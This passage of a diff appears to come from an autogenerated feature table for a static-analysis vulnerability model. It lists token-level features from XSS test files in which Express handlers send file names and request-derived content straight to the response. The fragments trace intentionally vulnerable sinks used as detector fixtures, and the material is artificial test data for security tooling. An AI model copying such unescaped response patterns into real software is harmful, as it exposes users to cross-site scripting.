autogenerated/Xss/ReflectedXss/tst3.js:12:3:12:16 | exceptional return of res.send(code) | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/tst3.js:12:3:12:16 | exceptional return of res.send(code) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/tst3.js:12:3:12:16 | exceptional return of res.send(code) | enclosingFunctionBody | reg res code prettier format reg body semi false parser babel res send code | +| autogenerated/Xss/ReflectedXss/tst3.js:12:3:12:16 | exceptional return of res.send(code) | enclosingFunctionName | app.post#functionalargument | +| autogenerated/Xss/ReflectedXss/tst3.js:12:3:12:16 | exceptional return of res.send(code) | fileImports | express prettier | +| autogenerated/Xss/ReflectedXss/tst3.js:12:3:12:16 | res.send(code) | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/tst3.js:12:3:12:16 | res.send(code) | contextSurroundingFunctionParameters | (reg, res) | +| autogenerated/Xss/ReflectedXss/tst3.js:12:3:12:16 | res.send(code) | enclosingFunctionBody | reg res code prettier format reg body semi false parser babel res send code | +| autogenerated/Xss/ReflectedXss/tst3.js:12:3:12:16 | res.send(code) | enclosingFunctionName | app.post#functionalargument | +| autogenerated/Xss/ReflectedXss/tst3.js:12:3:12:16 | res.send(code) | fileImports | express prettier | +| autogenerated/Xss/ReflectedXss/tst3.js:12:7:12:10 | send | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/tst3.js:12:7:12:10 | send | contextSurroundingFunctionParameters | (reg, res) | +| autogenerated/Xss/ReflectedXss/tst3.js:12:7:12:10 | send | enclosingFunctionBody | reg res code prettier format reg body semi false parser babel res send code | +| autogenerated/Xss/ReflectedXss/tst3.js:12:7:12:10 | send | enclosingFunctionName | app.post#functionalargument | +| autogenerated/Xss/ReflectedXss/tst3.js:12:7:12:10 | send | fileImports | express prettier | | autogenerated/Xss/ReflectedXss/tst3.js:12:12:12:15 | code | CalleeFlexibleAccessPath | res.send | | autogenerated/Xss/ReflectedXss/tst3.js:12:12:12:15 | code | InputArgumentIndex | 0 | | autogenerated/Xss/ReflectedXss/tst3.js:12:12:12:15 | code | contextFunctionInterfaces | | @@ -22325,36 +148413,194 @@ tokenFeatures | autogenerated/Xss/ReflectedXss/tst3.js:12:12:12:15 | code | enclosingFunctionName | app.post#functionalargument | | autogenerated/Xss/ReflectedXss/tst3.js:12:12:12:15 | code | fileImports | express prettier | | autogenerated/Xss/ReflectedXss/tst3.js:12:12:12:15 | code | receiverName | res | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:1:1:1:0 | this | contextFunctionInterfaces | format(files2) | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:1:1:1:0 | this | contextSurroundingFunctionParameters | | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:1:1:1:0 | this | fileImports | express fs http | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:1:1:1:1 | fs | contextFunctionInterfaces | format(files2) | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:1:1:1:1 | fs | contextSurroundingFunctionParameters | | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:1:1:1:1 | fs | fileImports | express fs http | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:1:1:1:1 | require | contextFunctionInterfaces | format(files2) | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:1:1:1:1 | require | contextSurroundingFunctionParameters | | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:1:1:1:1 | require | fileImports | express fs http | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:1:5:1:8 | http | contextFunctionInterfaces | format(files2) | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:1:5:1:8 | http | contextSurroundingFunctionParameters | | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:1:5:1:8 | http | fileImports | express fs http | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:1:5:1:26 | http | contextFunctionInterfaces | format(files2) | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:1:5:1:26 | http | contextSurroundingFunctionParameters | | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:1:5:1:26 | http | fileImports | express fs http | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:1:5:1:26 | http = ... 'http') | contextFunctionInterfaces | format(files2) | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:1:5:1:26 | http = ... 'http') | contextSurroundingFunctionParameters | | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:1:5:1:26 | http = ... 'http') | fileImports | express fs http | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:1:12:1:18 | require | contextFunctionInterfaces | format(files2) | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:1:12:1:18 | require | contextSurroundingFunctionParameters | | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:1:12:1:18 | require | fileImports | express fs http | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:1:12:1:26 | exceptional return of require('http') | contextFunctionInterfaces | format(files2) | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:1:12:1:26 | exceptional return of require('http') | contextSurroundingFunctionParameters | | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:1:12:1:26 | exceptional return of require('http') | fileImports | express fs http | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:1:12:1:26 | require('http') | contextFunctionInterfaces | format(files2) | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:1:12:1:26 | require('http') | contextSurroundingFunctionParameters | | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:1:12:1:26 | require('http') | fileImports | express fs http | | autogenerated/Xss/StoredXss/xss-through-filenames.js:1:20:1:25 | 'http' | CalleeFlexibleAccessPath | require | | autogenerated/Xss/StoredXss/xss-through-filenames.js:1:20:1:25 | 'http' | InputArgumentIndex | 0 | | autogenerated/Xss/StoredXss/xss-through-filenames.js:1:20:1:25 | 'http' | calleeImports | | | autogenerated/Xss/StoredXss/xss-through-filenames.js:1:20:1:25 | 'http' | contextFunctionInterfaces | format(files2) | | autogenerated/Xss/StoredXss/xss-through-filenames.js:1:20:1:25 | 'http' | contextSurroundingFunctionParameters | | | autogenerated/Xss/StoredXss/xss-through-filenames.js:1:20:1:25 | 'http' | fileImports | express fs http | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:2:5:2:6 | fs | contextFunctionInterfaces | format(files2) | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:2:5:2:6 | fs | contextSurroundingFunctionParameters | | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:2:5:2:6 | fs | contextSurroundingFunctionParameters | | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:2:5:2:6 | fs | fileImports | express fs http | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:2:5:2:22 | fs | contextFunctionInterfaces | format(files2) | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:2:5:2:22 | fs | contextSurroundingFunctionParameters | | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:2:5:2:22 | fs | fileImports | express fs http | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:2:5:2:22 | fs = require('fs') | contextFunctionInterfaces | format(files2) | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:2:5:2:22 | fs = require('fs') | contextSurroundingFunctionParameters | | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:2:5:2:22 | fs = require('fs') | fileImports | express fs http | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:2:10:2:16 | require | contextFunctionInterfaces | format(files2) | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:2:10:2:16 | require | contextSurroundingFunctionParameters | | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:2:10:2:16 | require | fileImports | express fs http | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:2:10:2:22 | exceptional return of require('fs') | contextFunctionInterfaces | format(files2) | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:2:10:2:22 | exceptional return of require('fs') | contextSurroundingFunctionParameters | | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:2:10:2:22 | exceptional return of require('fs') | fileImports | express fs http | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:2:10:2:22 | require('fs') | contextFunctionInterfaces | format(files2) | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:2:10:2:22 | require('fs') | contextSurroundingFunctionParameters | | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:2:10:2:22 | require('fs') | fileImports | express fs http | | autogenerated/Xss/StoredXss/xss-through-filenames.js:2:18:2:21 | 'fs' | CalleeFlexibleAccessPath | require | | autogenerated/Xss/StoredXss/xss-through-filenames.js:2:18:2:21 | 'fs' | InputArgumentIndex | 0 | | autogenerated/Xss/StoredXss/xss-through-filenames.js:2:18:2:21 | 'fs' | calleeImports | | | autogenerated/Xss/StoredXss/xss-through-filenames.js:2:18:2:21 | 'fs' | contextFunctionInterfaces | format(files2) | | autogenerated/Xss/StoredXss/xss-through-filenames.js:2:18:2:21 | 'fs' | contextSurroundingFunctionParameters | | | autogenerated/Xss/StoredXss/xss-through-filenames.js:2:18:2:21 | 'fs' | fileImports | express fs http | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:4:5:4:11 | express | contextFunctionInterfaces | format(files2) | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:4:5:4:11 | express | contextSurroundingFunctionParameters | | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:4:5:4:11 | express | fileImports | express fs http | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:4:5:4:32 | express | contextFunctionInterfaces | format(files2) | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:4:5:4:32 | express | contextSurroundingFunctionParameters | | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:4:5:4:32 | express | fileImports | express fs http | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:4:5:4:32 | express ... press') | contextFunctionInterfaces | format(files2) | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:4:5:4:32 | express ... press') | contextSurroundingFunctionParameters | | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:4:5:4:32 | express ... press') | fileImports | express fs http | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:4:15:4:21 | require | contextFunctionInterfaces | format(files2) | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:4:15:4:21 | require | contextSurroundingFunctionParameters | | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:4:15:4:21 | require | fileImports | express fs http | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:4:15:4:32 | exceptional return of require('express') | contextFunctionInterfaces | format(files2) | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:4:15:4:32 | exceptional return of require('express') | contextSurroundingFunctionParameters | | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:4:15:4:32 | exceptional return of require('express') | fileImports | express fs http | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:4:15:4:32 | require('express') | contextFunctionInterfaces | format(files2) | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:4:15:4:32 | require('express') | contextSurroundingFunctionParameters | | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:4:15:4:32 | require('express') | fileImports | express fs http | | autogenerated/Xss/StoredXss/xss-through-filenames.js:4:23:4:31 | 'express' | CalleeFlexibleAccessPath | require | | autogenerated/Xss/StoredXss/xss-through-filenames.js:4:23:4:31 | 'express' | InputArgumentIndex | 0 | | autogenerated/Xss/StoredXss/xss-through-filenames.js:4:23:4:31 | 'express' | calleeImports | | | autogenerated/Xss/StoredXss/xss-through-filenames.js:4:23:4:31 | 'express' | contextFunctionInterfaces | format(files2) | | autogenerated/Xss/StoredXss/xss-through-filenames.js:4:23:4:31 | 'express' | contextSurroundingFunctionParameters | | | autogenerated/Xss/StoredXss/xss-through-filenames.js:4:23:4:31 | 'express' | fileImports | express fs http | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:6:1:6:7 | express | contextFunctionInterfaces | format(files2) | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:6:1:6:7 | express | contextSurroundingFunctionParameters | | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:6:1:6:7 | express | fileImports | express fs http | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:6:1:6:9 | exceptional return of express() | contextFunctionInterfaces | format(files2) | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:6:1:6:9 | exceptional return of express() | contextSurroundingFunctionParameters | | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:6:1:6:9 | exceptional return of express() | fileImports | express fs http | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:6:1:6:9 | express() | contextFunctionInterfaces | format(files2) | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:6:1:6:9 | express() | contextSurroundingFunctionParameters | | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:6:1:6:9 | express() | fileImports | express fs http | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:6:1:6:13 | express().get | contextFunctionInterfaces | format(files2) | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:6:1:6:13 | express().get | contextSurroundingFunctionParameters | | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:6:1:6:13 | express().get | fileImports | express fs http | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:6:1:10:2 | exceptional return of express ... });\\n}) | contextFunctionInterfaces | format(files2) | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:6:1:10:2 | exceptional return of express ... });\\n}) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:6:1:10:2 | exceptional return of express ... });\\n}) | fileImports | express fs http | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:6:1:10:2 | express ... });\\n}) | contextFunctionInterfaces | format(files2) | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:6:1:10:2 | express ... });\\n}) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:6:1:10:2 | express ... });\\n}) | fileImports | express fs http | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:6:11:6:13 | get | contextFunctionInterfaces | format(files2) | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:6:11:6:13 | get | contextSurroundingFunctionParameters | | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:6:11:6:13 | get | fileImports | express fs http | | autogenerated/Xss/StoredXss/xss-through-filenames.js:6:15:6:17 | '/' | CalleeFlexibleAccessPath | express().get | | autogenerated/Xss/StoredXss/xss-through-filenames.js:6:15:6:17 | '/' | InputArgumentIndex | 0 | | autogenerated/Xss/StoredXss/xss-through-filenames.js:6:15:6:17 | '/' | calleeImports | express | | autogenerated/Xss/StoredXss/xss-through-filenames.js:6:15:6:17 | '/' | contextFunctionInterfaces | format(files2) | | autogenerated/Xss/StoredXss/xss-through-filenames.js:6:15:6:17 | '/' | contextSurroundingFunctionParameters | | | autogenerated/Xss/StoredXss/xss-through-filenames.js:6:15:6:17 | '/' | fileImports | express fs http | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:6:20:6:19 | fs | contextFunctionInterfaces | format(files2) | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:6:20:6:19 | fs | contextSurroundingFunctionParameters | | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:6:20:6:19 | fs | enclosingFunctionBody | req res fs readdir /myDir error files1 res send files1 | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:6:20:6:19 | fs | enclosingFunctionName | get#functionalargument | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:6:20:6:19 | fs | fileImports | express fs http | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:6:20:6:19 | this | contextFunctionInterfaces | format(files2) | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:6:20:6:19 | this | contextSurroundingFunctionParameters | | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:6:20:6:19 | this | enclosingFunctionBody | req res fs readdir /myDir error files1 res send files1 | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:6:20:6:19 | this | enclosingFunctionName | get#functionalargument | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:6:20:6:19 | this | fileImports | express fs http | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:6:20:6:20 | res | contextFunctionInterfaces | format(files2) | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:6:20:6:20 | res | contextSurroundingFunctionParameters | | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:6:20:6:20 | res | enclosingFunctionBody | req res fs readdir /myDir error files1 res send files1 | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:6:20:6:20 | res | enclosingFunctionName | get#functionalargument | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:6:20:6:20 | res | fileImports | express fs http | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:6:20:10:1 | 'arguments' object of anonymous function | contextFunctionInterfaces | format(files2) | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:6:20:10:1 | 'arguments' object of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:6:20:10:1 | 'arguments' object of anonymous function | enclosingFunctionBody | req res fs readdir /myDir error files1 res send files1 | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:6:20:10:1 | 'arguments' object of anonymous function | enclosingFunctionName | get#functionalargument | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:6:20:10:1 | 'arguments' object of anonymous function | fileImports | express fs http | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:6:20:10:1 | exceptional return of anonymous function | contextFunctionInterfaces | format(files2) | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:6:20:10:1 | exceptional return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:6:20:10:1 | exceptional return of anonymous function | enclosingFunctionBody | req res fs readdir /myDir error files1 res send files1 | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:6:20:10:1 | exceptional return of anonymous function | enclosingFunctionName | get#functionalargument | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:6:20:10:1 | exceptional return of anonymous function | fileImports | express fs http | | autogenerated/Xss/StoredXss/xss-through-filenames.js:6:20:10:1 | functio ... });\\n} | CalleeFlexibleAccessPath | express().get | | autogenerated/Xss/StoredXss/xss-through-filenames.js:6:20:10:1 | functio ... });\\n} | InputArgumentIndex | 1 | | autogenerated/Xss/StoredXss/xss-through-filenames.js:6:20:10:1 | functio ... });\\n} | calleeImports | express | | autogenerated/Xss/StoredXss/xss-through-filenames.js:6:20:10:1 | functio ... });\\n} | contextFunctionInterfaces | format(files2) | | autogenerated/Xss/StoredXss/xss-through-filenames.js:6:20:10:1 | functio ... });\\n} | contextSurroundingFunctionParameters | (req, res) | | autogenerated/Xss/StoredXss/xss-through-filenames.js:6:20:10:1 | functio ... });\\n} | fileImports | express fs http | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:6:20:10:1 | return of anonymous function | contextFunctionInterfaces | format(files2) | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:6:20:10:1 | return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:6:20:10:1 | return of anonymous function | enclosingFunctionBody | req res fs readdir /myDir error files1 res send files1 | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:6:20:10:1 | return of anonymous function | enclosingFunctionName | get#functionalargument | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:6:20:10:1 | return of anonymous function | fileImports | express fs http | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:6:29:6:31 | req | contextFunctionInterfaces | format(files2) | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:6:29:6:31 | req | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:6:29:6:31 | req | enclosingFunctionBody | req res fs readdir /myDir error files1 res send files1 | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:6:29:6:31 | req | enclosingFunctionName | get#functionalargument | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:6:29:6:31 | req | fileImports | express fs http | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:6:34:6:36 | res | contextFunctionInterfaces | format(files2) | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:6:34:6:36 | res | contextFunctionInterfaces | format(files2) | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:6:34:6:36 | res | contextSurroundingFunctionParameters | | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:6:34:6:36 | res | contextSurroundingFunctionParameters | | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:6:34:6:36 | res | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:6:34:6:36 | res | enclosingFunctionBody | req res fs readdir /myDir error files1 res send files1 | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:6:34:6:36 | res | enclosingFunctionBody | req res fs readdir /myDir error files1 res send files1 | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:6:34:6:36 | res | enclosingFunctionBody | req res fs readdir /myDir error files1 res send files1 | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:6:34:6:36 | res | enclosingFunctionName | get#functionalargument | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:6:34:6:36 | res | enclosingFunctionName | get#functionalargument | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:6:34:6:36 | res | enclosingFunctionName | get#functionalargument | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:6:34:6:36 | res | fileImports | express fs http | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:6:34:6:36 | res | fileImports | express fs http | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:7:5:7:6 | fs | contextFunctionInterfaces | format(files2) | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:7:5:7:6 | fs | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:7:5:7:6 | fs | enclosingFunctionBody | req res fs readdir /myDir error files1 res send files1 | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:7:5:7:6 | fs | enclosingFunctionName | get#functionalargument | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:7:5:7:6 | fs | fileImports | express fs http | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:7:5:7:14 | fs.readdir | contextFunctionInterfaces | format(files2) | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:7:5:7:14 | fs.readdir | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:7:5:7:14 | fs.readdir | enclosingFunctionBody | req res fs readdir /myDir error files1 res send files1 | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:7:5:7:14 | fs.readdir | enclosingFunctionName | get#functionalargument | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:7:5:7:14 | fs.readdir | fileImports | express fs http | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:7:5:9:6 | exceptional return of fs.read ... \\n }) | contextFunctionInterfaces | format(files2) | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:7:5:9:6 | exceptional return of fs.read ... \\n }) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:7:5:9:6 | exceptional return of fs.read ... \\n }) | enclosingFunctionBody | req res fs readdir /myDir error files1 res send files1 | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:7:5:9:6 | exceptional return of fs.read ... \\n }) | enclosingFunctionName | get#functionalargument | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:7:5:9:6 | exceptional return of fs.read ... \\n }) | fileImports | express fs http | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:7:5:9:6 | fs.read ... \\n }) | contextFunctionInterfaces | format(files2) | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:7:5:9:6 | fs.read ... \\n }) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:7:5:9:6 | fs.read ... \\n }) | enclosingFunctionBody | req res fs readdir /myDir error files1 res send files1 | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:7:5:9:6 | fs.read ... \\n }) | enclosingFunctionName | get#functionalargument | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:7:5:9:6 | fs.read ... \\n }) | fileImports | express fs http | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:7:8:7:14 | readdir | contextFunctionInterfaces | format(files2) | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:7:8:7:14 | readdir | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:7:8:7:14 | readdir | enclosingFunctionBody | req res fs readdir /myDir error files1 res send files1 | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:7:8:7:14 | readdir | enclosingFunctionName | get#functionalargument | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:7:8:7:14 | readdir | fileImports | express fs http | | autogenerated/Xss/StoredXss/xss-through-filenames.js:7:16:7:23 | "/myDir" | CalleeFlexibleAccessPath | fs.readdir | | autogenerated/Xss/StoredXss/xss-through-filenames.js:7:16:7:23 | "/myDir" | InputArgumentIndex | 0 | | autogenerated/Xss/StoredXss/xss-through-filenames.js:7:16:7:23 | "/myDir" | calleeImports | fs | @@ -22364,6 +148610,26 @@ tokenFeatures | autogenerated/Xss/StoredXss/xss-through-filenames.js:7:16:7:23 | "/myDir" | enclosingFunctionName | get#functionalargument | | autogenerated/Xss/StoredXss/xss-through-filenames.js:7:16:7:23 | "/myDir" | fileImports | express fs http | | autogenerated/Xss/StoredXss/xss-through-filenames.js:7:16:7:23 | "/myDir" | receiverName | fs | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:7:26:7:25 | res | contextFunctionInterfaces | format(files2) | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:7:26:7:25 | res | contextSurroundingFunctionParameters | | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:7:26:7:25 | res | enclosingFunctionBody | req res fs readdir /myDir error files1 res send files1 | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:7:26:7:25 | res | enclosingFunctionName | get#functionalargument | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:7:26:7:25 | res | fileImports | express fs http | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:7:26:7:25 | this | contextFunctionInterfaces | format(files2) | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:7:26:7:25 | this | contextSurroundingFunctionParameters | | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:7:26:7:25 | this | enclosingFunctionBody | req res fs readdir /myDir error files1 res send files1 | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:7:26:7:25 | this | enclosingFunctionName | get#functionalargument | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:7:26:7:25 | this | fileImports | express fs http | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:7:26:9:5 | 'arguments' object of anonymous function | contextFunctionInterfaces | format(files2) | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:7:26:9:5 | 'arguments' object of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:7:26:9:5 | 'arguments' object of anonymous function | enclosingFunctionBody | req res fs readdir /myDir error files1 res send files1 | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:7:26:9:5 | 'arguments' object of anonymous function | enclosingFunctionName | get#functionalargument | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:7:26:9:5 | 'arguments' object of anonymous function | fileImports | express fs http | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:7:26:9:5 | exceptional return of anonymous function | contextFunctionInterfaces | format(files2) | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:7:26:9:5 | exceptional return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:7:26:9:5 | exceptional return of anonymous function | enclosingFunctionBody | req res fs readdir /myDir error files1 res send files1 | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:7:26:9:5 | exceptional return of anonymous function | enclosingFunctionName | get#functionalargument | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:7:26:9:5 | exceptional return of anonymous function | fileImports | express fs http | | autogenerated/Xss/StoredXss/xss-through-filenames.js:7:26:9:5 | functio ... K\\n } | CalleeFlexibleAccessPath | fs.readdir | | autogenerated/Xss/StoredXss/xss-through-filenames.js:7:26:9:5 | functio ... K\\n } | InputArgumentIndex | 1 | | autogenerated/Xss/StoredXss/xss-through-filenames.js:7:26:9:5 | functio ... K\\n } | calleeImports | fs | @@ -22373,6 +148639,51 @@ tokenFeatures | autogenerated/Xss/StoredXss/xss-through-filenames.js:7:26:9:5 | functio ... K\\n } | enclosingFunctionName | get#functionalargument | | autogenerated/Xss/StoredXss/xss-through-filenames.js:7:26:9:5 | functio ... K\\n } | fileImports | express fs http | | autogenerated/Xss/StoredXss/xss-through-filenames.js:7:26:9:5 | functio ... K\\n } | receiverName | fs | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:7:26:9:5 | return of anonymous function | contextFunctionInterfaces | format(files2) | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:7:26:9:5 | return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:7:26:9:5 | return of anonymous function | enclosingFunctionBody | req res fs readdir /myDir error files1 res send files1 | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:7:26:9:5 | return of anonymous function | enclosingFunctionName | get#functionalargument | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:7:26:9:5 | return of anonymous function | fileImports | express fs http | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:7:36:7:40 | error | contextFunctionInterfaces | format(files2) | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:7:36:7:40 | error | 